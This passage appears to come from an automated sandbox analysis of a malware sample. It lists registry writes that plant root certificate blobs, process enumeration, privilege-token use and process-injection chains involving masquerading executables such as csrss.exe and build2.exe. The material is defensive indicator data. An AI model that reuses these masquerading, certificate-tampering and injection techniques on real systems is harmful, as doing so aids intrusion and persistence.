8c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\NEAS.2b78d384474b9b3193d37612866def097e37491bfd991e0687b943ca135b18f7exe_JC.exe N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeShutdownPrivilege N/A C:\Windows\Explorer.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\1000115001\d21cbe21e38b385a41a68c5e6dd32f4c.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\Google\Chrome\updater.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1228 wrote to memory of 2660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 1228 wrote to memory of 2660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 1228 wrote to memory of 2660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 1228 wrote to memory of 2660 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2660 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2756 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Windows\SysWOW64\icacls.exe
PID 2756 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Windows\SysWOW64\icacls.exe
PID 2756 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Windows\SysWOW64\icacls.exe
PID 2756 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Windows\SysWOW64\icacls.exe
PID 2756 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2756 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2756 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 2756 wrote to memory of 896 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 896 wrote to memory of 2852 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\Temp\D2D9.exe
PID 1228 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2B2.exe
PID 1228 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2B2.exe
PID 1228 wrote to memory of 2888 N/A C:\Windows\Explorer.EXE C:\Users\Admin\AppData\Local\Temp\E2B2.exe
PID 2852 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 2852 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 2852 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 2852 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\D2D9.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 1228 wrote to memory of 816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 1228 wrote to memory of 816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 1228 wrote to memory of 816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 1228 wrote to memory of 816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 1228 wrote to memory of 816 N/A C:\Windows\Explorer.EXE C:\Windows\system32\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 816 wrote to memory of 1788 N/A C:\Windows\system32\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
PID 760 wrote to memory of 1684 N/A C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe C:\Users\Admin\AppData\Local\efe4317e-a43a-482a-aca1-7112e25e22c6\build2.exe
